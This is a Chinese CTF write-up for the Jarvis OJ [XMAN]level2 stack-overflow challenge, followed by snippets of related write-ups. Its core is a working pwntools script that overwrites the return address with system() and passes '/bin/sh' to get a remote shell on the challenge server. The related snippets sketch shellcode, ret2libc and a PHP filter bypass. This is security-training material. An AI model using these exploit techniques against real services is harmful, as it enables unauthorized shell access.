Jarvis OJ - [XMAN]level2 - Writeup

简单利用“/bin/sh”夺权

简单看一下

放到ida中发现了“/bin/sh”串，和system函数，可以利用==

所以只要在vuln函数返回时跳转到system函数，同时添加参数“/bin/sh”就可以实现啦

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

io = remote("pwn2.jarvisoj.com",9878)
elf = ELF("./level2")

sys_addr = elf.symbols["system"]
bin_addr = elf.search("/bin/sh").next()

payload = ‘a‘*(0x88 + 0x4) #辣鸡填充值
payload += p32(sys_addr)   #覆盖返回地址到system函数
payload += p32(0xdeadbeef)　　#随意填写system函数调用结束的返回地址
payload += p32(bin_addr)　　#system函数的参数，指向“/bin/sh”，实现调用

io.recvline()
io.sendline(payload)
io.interactive()
io.close()

此时程序流程如图

放成果图

其实这种没有PIE保护的程序，很多函数地址可以直接从ida中复制过来，在exp中直接赋值为0x8048···，但是为了增强普适性，均使用symbols函数获得

作者：辣鸡小谱尼

出处：http://www.cnblogs.com/WangAoBo/

如有转载，荣幸之至！请随手标明出处；

时间： 2024-10-13 09:44:42

Jarvis OJ - [XMAN]level2 - Writeup的相关文章

Jarvis OJ - [XMAN]level1 - Writeup

Jarvis OJ - [XMAN]level1 - Writeup M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html 题目: 分析 checksec检查保护机制如下,NX没开,可以通过执行shellcode来get shell 拖到IDA中,查看函数的流程,vulnerable_function函数打印了缓冲区的起始地址,read可以读取0x100个字符,而buf到ret的偏移为0x88 + 0x4 < 0x100,而该el

Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用

100分的pwn 简单查看一下,果然还是比较简单的放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护所以我们很容易想到构造shellcode,在栈中执行shellcode拿shell权限 shellcode是一段恶意代码,在没有NX保护程序中,可能作为输入而写进栈,之后运行到此处时可以执行shellcode指令从而达到目的所以我们先截取buf的地址,在buf中写入夺shell的shellcode,之后再用buf的地址覆盖函数返回地址从

Jarvis OJ - [XMAN]level3 - Writeup——rop2libc尝试

这次除了elf程序还附带一个动态链接库先看一下,很一般的保护思路分析在ida中查看,可以确定通过read函数输入buf进行溢出,但是并没有看到合适的目标函数但是用ida打开附带的链接库,可以看到system函数和"/bin/sh"字符串都存在于是思路就确定为read函数溢出->system函数,同时加入参数"/bin/sh" 通过libc.so文件可以得到write.system和/bin/sh的偏移,但system和/bin/sh在内存的地址是未知

Jarvis OJ - 爬楼梯 -Writeup

Jarvis OJ - 爬楼梯 -Writeup 本来是想逆一下算法的,后来在学长的指导下发现可以直接修改关键函数,这个题做完有种四两拨千斤的感觉,记录在这里转载请标明出处:http://www.cnblogs.com/WangAoBo/p/7222012.html 题目: 分析: 先看apk的外部特征,在模拟器中安装apk,如下: 每次点击爬一层楼按钮以爬的楼层会加1,爬到了,看FLAG按钮点击无效,于是猜测需要爬到指定的楼层才可以看到flag. 首先大致浏览apk的java代码(这里使用的

Jarvis OJ Pwn writeup

Jarvis OJ Pwn writeup1.[XMAN]level02.[XMAN]level13.[XMAN]level2(简单64位栈溢出)4.[XMAN]level2(x64)5.[XMAN]level3(32位下两次溢出拿shell)6.[XMAN]level3_x64(基本64位栈溢出,简单ROP)7.[XMAN]level4(DynELF泄露system地址)8.[XMAN]level5(mprotect函数)9.Test Your Memory(简单栈溢出,覆盖返回地址)10.S

Jarvis OJ - class10 -Writeup

Jarvis OJ - class10 -Writeup 转载请注明出处:http://www.cnblogs.com/WangAoBo/p/7552266.html 题目: Jarivs OJ的一道misc,记录这道题的Writeup主要是想记录解题的脚本分析: 文件下载后是纯数据,binwalk发现为两段zlib压缩后的数据,其中第2段为default compression,这是信息1:strings查看字符串,发现IHDR, RGB, IDAT等和图像相关的字符,这是信息2: 步骤:

Jarvis OJ - DD-Hello -Writeup

Jarvis OJ - DD-Hello -Writeup 转载请注明出处http://www.cnblogs.com/WangAoBo/p/7239216.html 题目: 分析: 第一次做这道题时,file查看发现是OS X和IOS的可执行文件,就果断放弃了后来又一想,OS X是基于FreeBSD的,那Mach-O文件和elf应该也有相通之处,于是就尝试用IDA打开文件,居然真的打开了函数较少,并且都可F5出伪代码,逐个分析,整理如下: 关键代码: if ( !(result & 1)

jarvis OJ部分writeup

level 0 level 1 -- 简单shellcode利用 level 2 level 3 -- ret2libc尝试 level2&level3 x64 level 4 -- DynELF level 5 level 6 level4 --DynELF DynELF是在没有libc文件情况下,通过对任意地址的读,获得函数地址的工具通常情况下,可以通过leak两个函数got中所存的地址,从而确定libc版本,获得所需函数地址 libc版本查询但在查库无法确定版本的情况下,可以使用Dyn

jarvis OJ WEB IN a mess

链接:http://web.jarvisoj.com:32780/index.php?id=1 抓包,发现提示index.phps 访问: 接下来的思路就是构造payload,id可以用弱类型来解决 id=0b eregi函数可以用%00截断 b=%0011111 比较麻烦的是a的构造,看了大神的博客才知道需要a为一个文件,且内容为1112 is a nice lab!,经过百度,可以将此保存1.txt在自己的服务器上,然后根据10进制ip绕过所以完整的payload就是 http:/